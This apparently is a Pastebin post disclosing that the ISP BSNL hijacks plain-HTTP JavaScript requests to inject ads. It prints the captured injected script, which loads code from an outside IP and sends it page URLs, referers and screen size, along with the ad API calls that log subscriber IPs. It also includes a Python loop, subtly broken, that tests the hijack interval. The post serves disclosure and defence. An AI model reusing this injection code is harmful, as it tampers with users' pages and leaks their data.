Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- BSNL Ad Injection Documentation:
- Between the USER and the ISP (BSNL), when browsing any unsecured website (http), and that site happens to load a JS from an unsecured source (hence, the request has HTTP 'Referrer' header), the ISP monitors this request, hijacks the request and sends it's own script.
- eg request:
- GET /wp-includes/js/wp-emoji-release.min.js?ver=5.0.4 HTTP/1.1
- Host: planetgoahomes.in
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
- Accept: */*
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://planetgoahomes.in/properties-to-sell/
- Connection: keep-alive
- Cookie: pum-2844=true; pvc_visits[0]=1553233919b610a1553234126b1003
- Response:
- !function(){var a="/wp-includes/js/wp-emoji-release.min.js?ver=5.0.4",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l="117.254.84.212:3000/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fwp-includes%2Fjs%2Fwp-emoji-release.min.js%3Fver%3D5.0.4%22%2C%22referer%22:%22http:%2F%2Fplanetgoahomes.in%2Fproperties-to-sell%2F%22%2C%22host%22:%22planetgoahomes.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:8%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}}catch(a){}}();
- Once the Hijacking happens, it is paused for 65 seconds to reduce suspicion, so if the above request is duplicated within 65s, you will receive the expected response.
- Also, the Hijacked response headers are very different from the original headers, where the Content-Type is application/x-javascript, instead of text/javascript.
- Code to test the interval [Python]:
- import socket
- import time
- def getD():
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect(("www-personal.umich.edu", 80))
- msg += b'GET /~bazald/l/api/dynsections.js HTTP/1.1\r\n'
- msg += b'Host: www-personal.umich.edu\r\n'
- msg += b'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\n'
- msg += b'Accept: */*\r\n'
- msg += b'Accept-Language: en-US,en;q=0.5\r\n'
- msg += b'Accept-Encoding: gzip, deflate\r\n'
- msg += b'Referer: http://www-personal.umich.edu/~bazald/l/api/_s_d_l__main_8h_source.html\r\n'
- msg += b'Connection: Close\r\n'
- msg += b'Cookie: BIGipServer~WEBHOSTING-PROD-MACC~WWW_PERSONAL_HTTP=2483540877.20480.0000\r\n'
- msg += b'\r\n'
- s.send(msg)
- allR = b''
- while True:
- chunk = s.recv(16)
- if chunk == b'':
- s.close()
- break
- allR += chunk
- return allR
- ctr = 0
- while True:
- dd = getD()
- if b"Content-Type: text/javascript" in dd:
- ctr += 1
- print('Not Hijacked')
- else:
- print('!!!!Hijacked!!!!')
- #Adjust the sleep period to see changes, >= 65 will always result in hijacked script
- time.sleep(65)
- Once the above script is executed by the browser, it appends a new script into the DOM, along with the original script which was requested.
- The injected script tag looks like this:
- <script async="" src="//117.254.84.212:3000/getjs?nadipdata="%7B%22url%22:%22%2Fajax%2Flibs%2Fjquery%2F1.8.3%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Fdigg.com%2F%22%2C%22host%22:%22ajax.googleapis.com%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%7D"&screenheight=768&screenwidth=1366&tm=1559199614846&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>
- You can see the screen resolution is sent to the Ad server.
- This script loads a massive 340KB obfuscated script file, tailored to the subscriber (USER) which includes their subscriber id and IP address.
- The server itself is unreachable, and only listens to port 3000 for http requests.
- If you open the root page of the Ad server (http://117.254.84.212:3000/), it will display the following:
- ------------------------------------------
- Express
- Welcome to Express
- ------------------------------------------
- The server encompasses an AD API using JSON at http://117.254.84.212:3000/api/getnoti and http://117.254.84.212:3000/api/logerror (and maybe more) using GET and POST methods respectively
- Example:
- URL: http://117.254.84.212:3000/api/getnoti?tm=1559201611495&subscriberId=c2g4MzIyNDYyMzA1X3djZHJAYnNubC5pbg==&subscriberIP=<Snipped by me>&nadipdata="{\"url\":\"/ajax/libs/jquery/1.8.3/jquery.min.js\",\"referer\":\"http://digg.com/\",\"host\":\"ajax.googleapis.com\",\"categories\":[0],\"reputations\":[1],\"nadipdomain\":1}"&screenheight=768&screenwidth=1366&preadid=-1&cycle=false&_=1559201610551
- [GET request]
- Host: 117.254.84.212:3000
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://digg.com/
- Origin: http://digg.com
- Connection: keep-alive
- [Response]
- {"message":"No Ad available. Error calculatedAd null 3.","error":true}
- ------------------------------------------
- Immediately after, the following request is made (hence proving BSNL is logging all Ad requests and errors with the USER's IP address):
- URL: http://117.254.84.212:3000/api/logerror?tm=1559201611901
- [POST request]
- Host: 117.254.84.212:3000
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://digg.com/
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Content-Length: 378
- Origin: http://digg.com
- Connection: keep-alive
- Cache-Control: max-age=0
- [Query string]
- tm 1559201611901
- [Form data]
- error No+data+in+getnoti
- methodName loadFirstAd:+nadipdata:+{"message":"No+Ad+available.+Error+calculatedAd+null+3.","error":true}
- params {"browser":"Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:67.0)+Gecko/20100101+Firefox/67.0","referer":"http://digg.com/","subscriberIP":"<Snipped by me>"}
- [Response]
- {"message":"Ok"}
- Current solution:
- The HTML injection is unsolved, but the Ad injection can be avoided by blocking the IP address 117.254.84.212, hence the AD script will never load.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement